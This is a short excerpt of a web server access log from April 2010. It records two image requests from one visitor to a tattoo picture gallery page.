208.122.89.231 - - [23/Apr/2010:08:18:03 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
208.122.89.231 - - [23/Apr/2010:08:18:03 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
